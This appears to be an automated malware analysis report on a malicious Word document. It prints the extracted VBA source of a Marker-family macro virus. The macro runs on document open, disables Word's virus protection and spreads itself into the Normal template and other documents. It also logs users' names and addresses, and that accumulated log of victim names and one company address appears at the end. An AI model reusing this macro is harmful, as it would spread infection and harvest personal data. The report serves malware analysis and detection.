Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 8fd74f41b9d67ad7…

MALICIOUS

Office (OLE)

41.0 KB Created: 2001-02-21 07:17:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 6f8a4198ac63dda7c9aa2e5018791c89 SHA-1: f0c355a7920e0bd99fb5655dd79d48e6b5d188f2 SHA-256: 8fd74f41b9d67ad77931cbb81e4d298a475e0fd479b5fd6db5b278a02e275a33
120 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample is a malicious Office document containing VBA macros, specifically a Document_Open macro designed to execute upon opening. The macro appears to be obfuscated and attempts to spread itself to the NormalTemplate, likely to achieve persistence or facilitate further malicious actions. The document body itself is a letter concerning a debt and phone number transfer, which serves as a lure for the macro execution.

Heuristics 3

  • ClamAV: Doc.Trojan.Marker-15 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Marker-15
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 26163 bytes
SHA-256: 150d2b265e93b6b6cb301a0b95d3e6e07e62f9bc6420c9af7c0d1face1d91044
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

'Влом было макросы писать
































































Private Sub Document_Open()

On Error Resume Next

Const test = "Это не вирус. Просто прикол ;)"

'Объявление переменных
Dim SaveDocument, SaveNormalTemplate, DocumentPrepared, NormalTemplatePrepared As Boolean
Dim ad, nt As Object
Dim Code, UserAddress, LogData, LogFile As String

'Инициализация переменных
Set nt = NormalTemplate.VBProject.VBComponents.Item(1)
NormalTemplatePrepared = nt.CodeModule.Find(test, 0, 0, 0, 0)

Set ad = ActiveDocument.VBProject.VBComponents.Item(1)
DocumentPrepared = ad.CodeModule.Find(test, 0, 0, 0, 0)

'Чуток меняем опции для оптимизации работы
Options.VirusProtection = False
Options.SaveNormalPrompt = False
ActiveDocument.ReadOnlyRecommended = False

'Заражаем NormalTemplate
If (ad.CodeModule.Find(test, 0, 0, 0, 0) = True And _
    nt.CodeModule.Find(test, 0, 0, 0, 0) = False) Then
   
    Code = ad.CodeModule.Lines(1, ad.CodeModule.CountOfLines)
    
    For i = 1 To Len(Application.UserAddress)
      If Mid(Application.UserAddress, i, 1) <> Chr(13) Then
        If Mid(Application.UserAddress, i, 1) <> Chr(10) Then
          UserAddress = UserAddress & Mid(Application.UserAddress, i, 1)
        End If
      Else
        UserAddress = UserAddress & Chr(13) & "' "
      End If
    Next i
   
    Code = Code & Chr(13) & _
              "' " & Format(Date, "dddd, d mmm yyyy") & Chr(13) & _
              "' " & Application.UserName & Chr(13) & _
              "' " & UserAddress & Chr(13)
 
    nt.CodeModule.DeleteLines 1, nt.CodeModule.CountOfLines
    nt.CodeModule.AddFromString Code
End If

'Заражаем активный документ
If nt.CodeModule.Find(test, 0, 0, 0, 0) = True And _
  ad.CodeModule.Find(test, 0, 0, 0, 0) = False Then

  Code = nt.CodeModule.Lines(1, nt.CodeModule.CountOfLines)
  ad.CodeModule.DeleteLines 1, ad.CodeModule.CountOfLines
  ad.CodeModule.AddFromString Code
End If

'если пятница, тринадцатое, то хана тачке
If (Day(Now()) = 13) And (WeekDay(Now()) = 6) Then
  Value = MsgBox("Сегодня пятница, 13. Следовательно, на вашей тачке страшный вирус! Хи-хи :) Будем лечить?", vbYesNo)
  If Value = vbYes Then
    MsgBox ("А-а-а-а!!! Не лечится... Хана тачке :(((")
  Else
    MsgBox ("Правильное решение. Тупая шутка")
  End If
End If

  If Right(Application.UserName, 4) <> "лох!" Then
    Application.UserName = Application.UserName + " - лох!"
  End If
  ActiveDocument.Save
  
End Sub


























































'Фух, наконец-то клавишу Enter отжал :o)
' Saturday, 28 Nov 1998
' SPo0Ky
' Blue Planet - лох!
'



' Saturday, 28 Nov 1998
' MARK B. SEAY - лох!
'



' Friday, 4 Dec 1998
' UPS - лох!
'



' Thursday, 17 Dec 1998
' WRO - лох!
'



' Tuesday, 22 Dec 1998
' bd04619 - лох!
'



' Monday, 4 Jan 1999
' ss04789 - лох!
'



' Wednesday, 6 Jan 1999
' JDIETZ - лох!
'



' Saturday, 23 Jan 1999
' W95INST - лох!
'



' Tuesday, 26 Jan 1999
' cbreivis - лох!
'



' Monday, 1 Feb 1999
' C & L User - лох!
'



' Friday, 5 Feb 1999
' Davidson - лох!
'



' Monday, 8 Feb 1999
' uperstl
'



' Tuesday, 16 Feb 1999
' rkeeble - лох!
'



' Thursday, 18 Feb 1999
' pcosgrov - лох!
'



' Friday, 19 Feb 1999
' lyoung - лох!
'



' Tuesday, 23 Feb 1999
' Giuseppe Bacco - лох!
'



' Tuesday, 23 Feb 1999
' jstewart - лох!
'



' вторник, 2 мар 1999
' Korneyev - лох!
' Україна, 252030, м.Київ, вул. Б.Хмельницького, 46
' ТОВ "Перспектива-ТБ"



' понедельник, 3 мар 1997
' Administrator - лох!
'



' понедельник, 22 мар 1999
' den - лох!
... (truncated)